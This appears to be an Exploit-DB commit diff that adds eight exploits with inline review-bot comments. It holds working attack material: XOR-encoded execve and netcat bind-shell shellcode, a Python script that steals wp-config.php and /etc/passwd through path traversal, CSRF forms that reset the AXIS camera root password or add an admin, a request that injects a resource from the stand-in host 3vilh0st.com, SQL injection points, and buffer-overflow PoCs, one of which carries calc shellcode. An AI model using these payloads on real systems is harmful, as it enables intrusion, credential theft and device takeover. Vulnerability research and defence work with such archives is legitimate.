DB: 2017-03-18
8 new exploits Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow FTPShell Client 6.53 - Local Buffer Overflow Linux/x86 - Encoded exceve(_/bin/sh_) Shellcode (44 Bytes) Linux/x86 - Bind Shell Shellcode (51 bytes) Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download AXIS Communications - Cross-Site Scripting / Content Injection AXIS Multiple Products - Cross-Site Request Forgery Departmental Store Management System 1.2 - SQL Injection
This commit is contained in:
parent
5b8d706b7d
commit
4da96605a4
9 changed files with 661 additions and 0 deletions
|
@ -5397,7 +5397,9 @@ id,file,description,date,author,platform,type,port
|
|||
41611,platforms/multiple/dos/41611.txt,"Adobe Flash - ATF Planar Decompression Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
|
||||
41612,platforms/multiple/dos/41612.txt,"Adobe Flash - AVC Header Slicing Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
|
||||
41615,platforms/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow",2017-03-15,"Hossein Lotfi",windows,dos,0
|
||||
41620,platforms/windows/dos/41620.txt,"Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow",2017-03-16,"Nassim Asrir",windows,dos,0
|
||||
41623,platforms/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",windows,dos,0
|
||||
41629,platforms/windows/dos/41629.py,"FTPShell Client 6.53 - Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,windows,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -15956,6 +15958,8 @@ id,file,description,date,author,platform,type,port
|
|||
41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
|
||||
41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - Encoded exceve(_/bin/sh_) Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0
|
||||
41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (51 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
@ -37534,3 +37538,7 @@ id,file,description,date,author,platform,type,port
|
|||
41616,platforms/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,ruby,webapps,0
|
||||
41617,platforms/php/webapps/41617.txt,"Steam Profile Integration 2.0.11 - SQL injection",2017-03-13,DrWhat,php,webapps,0
|
||||
41618,platforms/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",aspx,webapps,0
|
||||
41622,platforms/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",php,webapps,0
|
||||
41625,platforms/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,hardware,webapps,0
|
||||
41626,platforms/hardware/webapps/41626.txt,"AXIS Multiple Products - Cross-Site Request Forgery",2017-03-17,Orwelllabs,hardware,webapps,0
|
||||
41627,platforms/php/webapps/41627.txt,"Departmental Store Management System 1.2 - SQL Injection",2017-03-17,"Ihsan Sencan",php,webapps,0
|
||||
|
|
|
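Review bot: The new 41630 entry in the second hunk misspells the syscall in its description, `"Linux/x86 - Encoded exceve(_/bin/sh_) Shellcode (44 Bytes)"`; it should read `execve`, and because files.csv is the searchable index the typo hides the entry from anyone searching for execve shellcode. The header of 41630.asm carries the same spelling, so both should be corrected together. The remaining new entries in the first and third hunks match their file paths and dates.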
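--- a/platforms/hardware/webapps/41625.txt
+++ b/platforms/hardware/webapps/41625.txt
@@ -0,0 +1,229 @@
+0RWELLL4BS
+**********
+security advisory
+olsa-2015-8258
+PGP: 79A6CCC0
+@orwelllabs
+
+
+
+
+Advisory Information
+====================
+- Title: ImagePath Resource Injection/Open script editor
+- Vendor: AXIS Communications
+- Research and Advisory: Orwelllabs
+- Class: Improper Input Validation [CWE-20]
+- CVE Name: CVE-2015-8258
+- Affected Versions: Firmwares versions <lt 5.80.x
+- IoT Attack Surface: Device Administrative Interface/Authentication/Autho
+rization
+- OWASP IoTTop10: I1, I2
+
+
+
+Technical Details
+=================
+The variable "imagePath=" (that is prone to XSS in a large range of
+products) also can be used to resource injection intents. If inserted a URL
+in this variable will be made an GET request to this URL, so this an
+interesting point to request malicious codes from the attacker machine, and
+of course, the possibilities are vast (including hook the browser).
+
+
+An attacker sends the following URL for the current Web user interface of
+the camera:
+http://{AXISVULNHOST}/view.shtml?imagepath=http://www.3vilh0
+st.com/evilcode.html
+
+This request will be processed normally and will return the status code 200
+(OK):
+
+[REQUEST]
+
+GET /view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html HTTP/1.1
+Host: {axisvulnhost}
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
+Firefox/41.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Authorization: Digest username="Winst0n", realm="AXIS_XXXXXXXXXXX",
+nonce="00978cY6s4g@Sadd1b11a9A6ed955e1b5ce9eb",
+uri="/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html",
+response="5xxxxxxxxxxxxxxxxxxxxxx", qop=auth,
+nc=0000002b, cnonce="00rw3ll4bs0rw3lll4bs"
+Connection: keep-alive
+
+
+GET /evilcode.html HTTP/1.1
+Host: www.3vilh0st.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
+Firefox/41.0
+Accept: image/png,image/*;q=0.8,*/*;q=0.5
+Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://{axisvulnhost}/view.shtml?imagepath=http://www.3vilh0
+st.com/evilcode.html
+Connection: keep-alive
+
+The server response can be seen below (with the clipping of the affected
+HTML code snippets - just look for "http://www.3vilh0st.com/evilcode.html"):
+
+
+<table border="0" cellpadding="3" cellspacing="3">
+<tr>
+<td id="videoStreamTable">
+<script language="JavaScript">
+<!--
+video('http://www.3vilh0st.com/evilcode.html');
+// -->
+</script>
+</td>
+</tr>
+</table>
+
+[..SNIP..]
+
+function listVideoSources()
+{
+var formInt = document.listFormInt;
+var formExt = document.listFormExt;
+var formCrop = document.listFormCrop;
+var presetForm = document.listFormPreset;
+var form = document.WizardForm
+var currentPath = 'http://www.3vilh0st.com/evilcode.html';
+var imageSource;
+
+[..SNIP..]
+
+var reload = false;
+reload |= (other != null && other.search("seq=yes") >= 0);
+reload |= (other != null && other.search("streamprofile=") >= 0);
+reload |= ((other == null || (other != null && other.search("streamprofile=
+;)(r") == -1)) && ('' != ""));
+reload |= (imagePath != 'http://www.3vilh0st.com/evilcode.html');
+
+[..SNIP..]
+
+<script SRC="/incl/activeX.js?id=69"></script>
+</head>
+<body class="bodyBg" topmargin="0" leftmargin="15" marginwidth="0"
+marginheight="0" onLoad="DrawTB('no', 'http://www.3vilh0st.com/evilcode.html',
+'1', '0', 'no', 'no', 'true', getStreamProfileNbr());" onResize="">
+<script language="JavaScript">
+
+[..SNIP..]
+
+// Draw the scale buttons
+var currentResolution = 0
+var width = 0
+var height = 0
+var imagepath = "http://www.3vilh0st.com/evilcode.html"
+var resStart = imagepath.indexOf("resolution=")
+if (resStart != -1) {
+var resStop = imagepath.indexOf("&", resStart)
+
+[..SNIP..]
+
+
+=================== view.shtml snips =====================
+
+447 function zoom(size)
+448 {
+449 var url = document.URL;
+450
+451 if (url.indexOf("?") == -1) {
+452 url += "F?size=" + size
+453 } else if (url.indexOf("size=") == -1) {
+454 url += "&size=" + size
+455 } else {
+456 var searchStr = "size=<!--#echo var="size"
+option="encoding:javascript" -->"
+457 var replaceStr = "size=" + size
+458 var re = new RegExp(searchStr , "g")
+459 url = url.replace(re, replaceStr)
+460 }
+461
+462 document.location = url;
+463 }
+464
+465 var aNewImagePath;
+466
+467 function reloadPage()
+468 {
+469 document.location = aNewImagePath;
+470 }
+471
+
+[ SNIP ]
+
+567 aNewImagePath = '/view/view.shtml?id=<!--#echo
+var="ssi_request_id" option="encoding:url" -->&imagePath=' +
+escape(imagePath) + size;
+568 if (other != null)
+569 aNewImagePath += other;
+570 <!--#if expr="$ptzpresets = yes" -->
+571 /* append preset parameters so that preset postion is selected in
+drop down list after reload */
+572 if (presetName != '')
+573 aNewImagePath += "&gotopresetname=" + escape(presetName);
+574 else if (gotopresetname != '')
+575 aNewImagePath += "&gotopresetname=" + escape(gotopresetname);
+576
+577 if( newCamera != '')
+578 aNewImagePath += "&camera=" + escape(newCamera);
+
+
+
+---*---
+Some legitimate resources can be very interesting to cybercriminals with
+your hansowares/botnets/bitcoinminer/backdoors/malwares etc. In this case
+there are some resources, like the "Open Script Editor". By this resource
+the user can edit any file in the operation system with root privileges,
+because everything (in the most part of IoT devices) runs with root
+privileges, this is other dangerous point to keep in mind.
+
+> Open Script Editor path: 'System Options' -> 'Advanced' -> 'Scripting'
+
+Well, one can say that this feature is restricted to the administrator of
+the camera, and this would be true if customers were forced to change the
+default password during setup phase with a strong password policy, since
+change "pass" to "pass123" does not solve the problem. The aggravating
+factor is that there are thousands of products available on the internet,
+running with default credentials.
+
+
+Vendor Information, Solutions and Workarounds
++++++++++++++++++++++++++++++++++++++++++++++
+According to the manufacturer, the resource injection vulnerability was
+fixed in firmware 5.60, but we identified that the problem still occurred
+in 5.80.x versions of various product models. Check for updates on the
+manufacturer's website.
+
+About Open Script Editor,It was considered that in order to have access to
+this feature, it is necessary to be authenticated as an admin, but if there
+is no policy that forces the client to change the password during the
+product setup (ease vs. security) and also requires a password complexity,
+having an administrative credential to abuse the functionality is not
+exactly an impediment (e.g: botnets that bring embedded in the code a
+relation of default credentials for that type of device)
+
+
+Credits
+=======
+These vulnerabilities has been discovered and published by Orwelllabs.
+
+
+Legal Notices
+=============
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise. We accept no
+responsibility for any damage caused by the use or misuse of this
+information.
+
+
+About Orwelllabs
+================
+https://www.exploit-db.com/author/?a=8225
+https://packetstormsecurity.com/files/author/12322/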
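Review bot: The header line `- Affected Versions: Firmwares versions <lt 5.80.x` contradicts the vendor section, which states the problem still occurred in 5.80.x versions; the header should agree with the body, e.g. `- Affected Versions: firmware up to and including 5.80.x (vendor reports a fix in 5.60; still reproduced on 5.80.x)`. The advisory also never names the product models on which 5.80.x was retested, which is what an administrator needs to decide whether a given device is affected. The sample request carries a Digest `Authorization` header, so the text should state plainly that the injection was observed from an authenticated session rather than leaving that to be inferred from the capture.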
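--- a/platforms/hardware/webapps/41626.txt
+++ b/platforms/hardware/webapps/41626.txt
@@ -0,0 +1,103 @@
+0RWELLL4BS
+**********
+security advisory
+olsa-CVE-2015-8255
+PGP: 79A6CCC0
+@orwelllabs
+
+
+
+
+Advisory Information
+====================
+- Title: Cross-Site Request Forgery
+- Vendor: AXIS Communications
+- Research and Advisory: Orwelllabs
+- Class: Session Management control [CWE-352]
+- CVE Name: CVE-2015-8255
+- Affected Versions:
+- IoT Attack Surface: Device Web Interface
+- OWASP IoTTop10: I1
+
+
+
+Technical Details
+=================
+Because of the own (bad) design of this kind of device (Actualy a big
+problem of IoT, one of them)
+The embedded web application does not verify whether a valid request was
+intentionally provided by the user who submitted the request.
+
+
+
+PoCs
+====
+#-> Setting root password to W!nst0n
+
+<html>
+<!-- CSRF PoC Orwelllabs -->
+<body>
+<form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
+<input type="hidden" name="action" value="update" />
+<input type="hidden" name="user" value="root" />
+<input type="hidden" name="pwd" value="w!nst0n" />
+<input type="hidden" name="comment" value="Administrator" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
+
+
+#-> Adding new credential SmithW:W!nst0n
+
+<html>
+<!-- CSRF PoC - Orwelllabs -->
+<body>
+<form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
+<input type="hidden" name="action" value="add" />
+<input type="hidden" name="user" value="SmithW" />
+<input type="hidden" name="sgrp"
+value="viewer:operator:admin:ptz" />
+<input type="hidden" name="pwd" value="W!nst0n" />
+<input type="hidden" name="grp" value="users" />
+<input type="hidden" name="comment" value="WebUser" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
+
+
+#-> Deleting an app via directly CSRF (axis_update.shtml)
+
+http://xxx.xxx.xxx.xxx/axis-cgi/vaconfig.cgi?action=get&name=<script src="
+http://xxx.xxx.xxx.xxx/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml
+"></script>
+
+
+[And many acitions allowed to an user [all of them?] can be forged in this
+way]
+
+
+Vendor Information, Solutions and Workarounds
++++++++++++++++++++++++++++++++++++++++++++++
+Well, this is a very old design problem of this kind of device, nothing new
+to say about that.
+
+
+Credits
+=======
+These vulnerabilities has been discovered and published by Orwelllabs.
+
+
+Legal Notices
+=============
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise. We accept no
+responsibility for any damage caused by the use or misuse of this
+information.
+
+
+About Orwelllabs
+================
+https://www.exploit-db.com/author/?a=8225
+https://packetstormsecurity.com/files/author/12322/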
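Review bot: The header field `- Affected Versions:` is left empty, so readers cannot tell which firmware lines the CSRF was confirmed on; it should list the tested versions or state `- Affected Versions: not determined (tested on [firmware version placeholder])`. The third PoC, the `vaconfig.cgi?action=get&name=<script src="...">` URL, appears to rely on the `name` parameter being reflected unescaped and then loading `local_del.cgi` from the page, which is a reflected script injection chained into the CSRF rather than a plain forged form, and the text should say so since the fix for that part is output encoding, not only an anti-CSRF token. The advisory id `olsa-CVE-2015-8255` also uses a different format from the companion advisory's `olsa-2015-8258`.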
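--- a/platforms/lin_x86/shellcode/41630.asm
+++ b/platforms/lin_x86/shellcode/41630.asm
@@ -0,0 +1,84 @@
+;================================================================================
+; The MIT License
+;
+; Copyright (c) <year> <copyright holders>
+;
+; Permission is hereby granted, free of charge, to any person obtaining a copy
+; of this software and associated documentation files (the "Software"), to deal
+; in the Software without restriction, including without limitation the rights
+; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+; copies of the Software, and to permit persons to whom the Software is
+; furnished to do so, subject to the following conditions:
+;
+; The above copyright notice and this permission notice shall be included in
+; all copies or substantial portions of the Software.
+;
+; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+; THE SOFTWARE.
+;================================================================================
+; Name : Encrypt Linux x86 Shellcode(44 Bytes) To exceve("/bin/sh")
+; Author : WangYihang
+; Email : wangyihanger@gmail.com
+; Tested on: Linux_x86
+; Shellcode Length: 44
+;================================================================================
+; Shellcode :
+; char shellcode[] = "\xeb\x10\x5e\x31\xc9\xb1\x15\x8a"
+; "\x06\x34\xe9\x88\x06\x46\xe2\xf7"
+; "\xeb\x05\xe8\xeb\xff\xff\xff\xd8"
+; "\x20\xb8\x81\xc6\xc6\x9a\x81\x81"
+; "\xc6\x8b\x80\x87\x60\x0a\x83\xe2"
+; "\xb1\x70\x24\x69";
+;================================================================================
+; Python :
+; shellcode = "\xeb\x10\x5e\x31\xc9\xb1\x15\x8a\x06\x34\xe9\x88\x06\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff\xd8\x20\xb8\x81\xc6\xc6\x9a\x81\x81\xc6\x8b\x80\x87\x60\x0a\x83\xe2\xb1\x70\x24\x69"
+;================================================================================
+; Assembly language code :
+
+global _start
+; this shell code will xor every byte of 'jocker' segment , then execute them
+; password is 0xe9 (233)
+_start:
+jmp jocker
+loader:
+pop esi ; get address of encrypted shellcode
+xor ecx, ecx
+mov cl, 21 ; loop times (length of encrypt shellcode)
+decrypt:
+mov al, [esi]
+xor al, 0e9H
+mov [esi], al
+inc esi
+loop decrypt
+jmp encrypt
+
+jocker:
+call loader
+encrypt:
+db 0d8H
+db 20H
+db 0b8H
+db 81H
+db 0c6H
+db 0c6H
+db 9aH
+db 81H
+db 81H
+db 0c6H
+db 8bH
+db 80H
+db 87H
+db 60H
+db 0aH
+db 83H
+db 0e2H
+db 0b1H
+db 70H
+db 24H
+db 69H
+;================================================================================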
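Review bot: The comment `; this shell code will xor every byte of 'jocker' segment , then execute them` names the wrong label: the bytes the loop rewrites are the `db` run under `encrypt:`, while `jocker:` holds only the `call loader`, and the header `; Name : Encrypt Linux x86 Shellcode(44 Bytes) To exceve("/bin/sh")` both misspells execve and describes a run-time decoder stub as an encryptor. Suggested wording: `; decoder stub: XORs the 21 bytes at 'encrypt' with 0xe9 in place, then jumps to them` and `; Name : XOR-encoded Linux x86 execve("/bin/sh") shellcode (44 bytes)`. The MIT license block still carries its `<year> <copyright holders>` placeholders, which should be filled in or the block dropped. The `mov cl, 21` bound does match the 21 `db` lines, so the loop count is consistent.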
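--- a/platforms/lin_x86/shellcode/41631.c
+++ b/platforms/lin_x86/shellcode/41631.c
@@ -0,0 +1,49 @@
+/*
+# Super_Small_Bind_Shell (x86)
+# Date: 17.03.2017
+# This shellcode will listen on port 37 and show you how deep the rabbit hole goes
+# Please note that 37 port is below 1024 and thus privileged!
+# Shellcode Author: ALEH BOITSAU
+# Shellcode Length: 51 bytes ;)
+# Tested on: Debian GNU/Linux 8/x86_64
+# Command: gcc -m32 -z execstack super_small_bind_shell.c -o super_small_bind_shell
+
+global _start
+section .text
+_start:
+xor eax, eax
+push eax
+push 0x3733702d ;-p37
+mov esi, esp
+
+push eax
+push 0x68732f2f ;-le//bin//sh
+push 0x6e69622f
+push 0x2f656c2d
+mov edi, esp
+
+push eax
+push 0x636e2f2f ;/bin//nc
+push 0x6e69622f
+mov ebx, esp
+
+push eax
+push esi
+push edi
+push ebx
+mov ecx, esp
+mov al,11
+int 0x80
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[] =
+"\x31\xc0\x50\x68\x2d\x70\x33\x37\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
+main()
+{
+printf("Shellcode Length: %d\n",strlen(shellcode));
+int (*ret)() = (int(*)())shellcode;
+ret();
+}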
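Review bot: `printf("Shellcode Length: %d\n",strlen(shellcode));` passes a `size_t` to `%d` and hands an `unsigned char *` to `strlen`, which takes `const char *`; it should be `printf("Shellcode Length: %zu\n", strlen((const char *)shellcode));`, and `main()` should be `int main(void)` since implicit int is not valid C99. The header comment should also say that the payload is not self-contained: the assembly only calls execve on `/bin//nc` with `-le//bin//sh` and `-p37`, so the "listen on port 37" behaviour comes from a netcat build that supports `-e`, and the note about port 37 being privileged applies to that process. `# Tested on: Debian GNU/Linux 8/x86_64` would be clearer with a mention that the harness is built with `-m32`, as the Command line shows.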
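--- a/platforms/php/webapps/41622.py
+++ b/platforms/php/webapps/41622.py
@@ -0,0 +1,60 @@
+import requests
+import string
+import random
+from urlparse import urlparse
+
+print "---------------------------------------------------------------------"
+print "Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nWebsite: https://www.alien-within.com\nCVE-2017-1002008\nCWE: 23\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=187"
+print "---------------------------------------------------------------------"
+victim = raw_input("Please Enter victim host e.g. http://example.com: ")
+file_choice=raw_input ("\n Please choose a number representing the file to attack: \n1. Wordpress Config \n2. Linux Passwd File\n")
+if file_choice == "1":
+payload="..././..././..././wp-config.php"
+elif file_choice == "2":
+payload="..././..././..././..././..././..././..././..././etc/passwd"
+else:
+print "Invalid Download choice, Please choose 1 or 2; Alternatively you can re-code me toI will now exit"
+quit()
+slug = "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file="+payload
+target=victim+slug
+def randomizeFile(size=6, chars=string.ascii_uppercase + string.digits):
+return ''.join(random.choice(chars) for _ in range(size))
+
+def checkPlugin():
+pluginExists = requests.get(victim+"/wp-content/plugins/membership-simplified-for-oap-members-only/download.php")
+pluginExistence = pluginExists.status_code
+if pluginExistence == 200:
+print "\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..."
+exploit()
+else:
+print "Target has a funny code & might not be vulnerable, I will now exit\n"
+quit()
+
+def exploit():
+
+getThatFile = requests.get(target)
+fileState = getThatFile.status_code
+breakApart=urlparse(victim)
+extract_hostname=breakApart.netloc
+randomDifferentiator=randomizeFile()
+cleanName=str(randomDifferentiator)
+if fileState == 200:
+respFromThatFile = getThatFile.text
+if file_choice == "1":
+resultFile=extract_hostname+"_config_"+cleanName+".txt"
+print resultFile
+pwned=open(resultFile, 'w')
+pwned.write(respFromThatFile)
+pwned.close
+print "Wordpress Config Written to "+resultFile
+else:
+resultFile=extract_hostname+"_passwd"+cleanName+".txt"
+pwned=open(resultFile, 'w')
+pwned.write(respFromThatFile)
+pwned.close
+print "Passwd File Written to "+resultFile
+else:
+print "I am not saying it was me but it was me! Something went wrong when I tried to get the file. The server responded with: \n" +fileState
+
+if __name__ == "__main__":
+checkPlugin()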
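Review bot: `pwned.close` on both write paths in exploit() references the method without calling it, so the output file is closed only when the object is garbage-collected; the open/write/close triples should become `with open(resultFile, 'w') as pwned:` followed by `pwned.write(respFromThatFile)`. The error branch `print "... The server responded with: \n" +fileState` concatenates a str with the integer status code and raises TypeError instead of reporting the failure; it needs `+ str(fileState)`. checkPlugin() also reports "seems vulnerable" on any 200 from download.php, which is a presence check rather than a version check, and its message should say so. Note that the rendered page has dropped the file's indentation, so the nesting of the `if`/`else` blocks is inferred here.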
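--- a/platforms/php/webapps/41627.txt
+++ b/platforms/php/webapps/41627.txt
@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: Pasal - Departmental Store Management System v1.2 - SQL Injection
+# Google Dork: N/A
+# Date: 17.03.2017
+# Vendor Homepage: http://webstarslab.com
+# Software : http://webstarslab.com/products/pasal-departmental-store-management-system/
+# Demo: http://webstarslab.com/departmental-store-management-system/store/
+# Version: 1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/module.php?module=vendors&page=edit-vendors&id=[SQL]
+# http://localhost/[PATH]/module.php?module=units&page=edit-units&id=[SQL]
+# http://localhost/[PATH]/module.php?module=currency&page=edit-currency&id=[SQL]
+# http://localhost/[PATH]/module.php?module=category&page=edit-category&id=[SQL]
+# http://localhost/[PATH]/module.php?module=purchase&y=[SQL]&m=[SQL]
+# tbl_users:id
+# tbl_users:username
+# tbl_users:password
+# tbl_users:email
+# tbl_users:full_name
+# tbl_users:permission
+# Etc..
+# # # # #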
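--- a/platforms/windows/dos/41620.txt
+++ b/platforms/windows/dos/41620.txt
@@ -0,0 +1,50 @@
+[+] Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow
+[+] Credits / Discovery: Nassim Asrir
+[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
+[+] Author Company: Henceforth
+[+] CVE: CVE-2017-6880
+
+Vendor:
+===============
+
+https://www.cerberusftp.com/
+
+
+Download:
+===========
+
+https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)
+
+
+Vulnerability Type:
+===================
+
+Remote Buffer Overflow.
+
+
+issue:
+===================
+
+This problem happens when the Attacker send the bad char "A" in the command "MLST" (2047).
+
+POC:
+===================
+#Simple POC by Nassim Asrir from Henceforth.
+import socket
+bad_char = "A"*2047
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('192.168.1.81',21))
+s.recv(1024)
+s.send('USER nassim\r\n')
+s.recv(1024)
+s.send('PASS mypass\r\n')
+s.recv(1024)
+s.send('MLST ' + bad_char + '\r\n')
+s.close()
+
+https://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip
+
+Tested on:
+===============
+
+Windows 7 Sp1 (64 Bit)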
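Review bot: The "issue" section, `This problem happens when the Attacker send the bad char "A" in the command "MLST" (2047).`, never states the observed effect — whether the service crashed, what exception or fault was seen, or whether it recovered — so the "Remote Buffer Overflow" classification cannot be checked against the advisory; it should record what happened on the tested build. "bad char" is also a misnomer here, since the PoC sends an oversized 2047-byte argument rather than a character the parser rejects: `This problem happens when an authenticated user sends a 2047-byte argument to the MLST command.` The PoC hardcodes `192.168.1.81` and a username/password, and the `USER`/`PASS` exchange means valid credentials are a precondition; saying so explicitly, and marking those values as placeholders, would make the attack surface clear to administrators assessing exposure.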
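--- a/platforms/windows/dos/41629.py
+++ b/platforms/windows/dos/41629.py
@@ -0,0 +1,49 @@
+print '''
+
+##############################################
+# Created: ScrR1pTK1dd13 #
+# Name: Greg Priest #
+# Mail: ScrR1pTK1dd13.slammer@gmail.com #
+##############################################
+
+# Exploit Title: FTPShell Client 6.53 Session name BufferOverflow
+# Date: 2017.03.17
+# Exploit Author: Greg Priest
+# Version: FTPShell Client 6.53
+# Tested on: Windows7 x64 HUN/ENG Professional
+'''
+
+
+a = "A" * 460
+b = '\xDC\xE8\x65\x76'
+nop = '\x90' * 10
+c = "C" * 1638
+
+#calc.exe
+shellcode =(
+"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
+"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
+"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
+"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
+"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
+"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
+"\x45\x81\x3e\x43\x72\x65\x61\x75" +
+"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
+"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
+"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
+"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
+"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
+"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
+"\x53\x53\x53\x53\x52\x53\xff\xd7")
+
+evilstring = a+b+nop+shellcode+c
+
+
+file = open ('evilstring.txt', "w")
+file.write(evilstring)
+file.close
+
+print evilstring
+
+
+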
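Review bot: `file.close` at the end of the script references the method without calling it, so the handle is closed only by garbage collection, and the name `file` shadows a builtin; use `with open('evilstring.txt', 'w') as out:` followed by `out.write(evilstring)`. The constant `b = '\xDC\xE8\x65\x76'` has no comment saying which module and build it was taken from, which a reader needs to relate it to `# Tested on: Windows7 x64 HUN/ENG Professional`; a comment such as `# [module/offset placeholder] — valid only for the build named under 'Tested on'` would document it. `print evilstring` writes the raw bytes, including the `\x90` run and the shellcode, to the terminal and is presumably a leftover debug line. Note that the rendered page has dropped the original indentation and box-comment padding, so the docstring block is reproduced here as extracted.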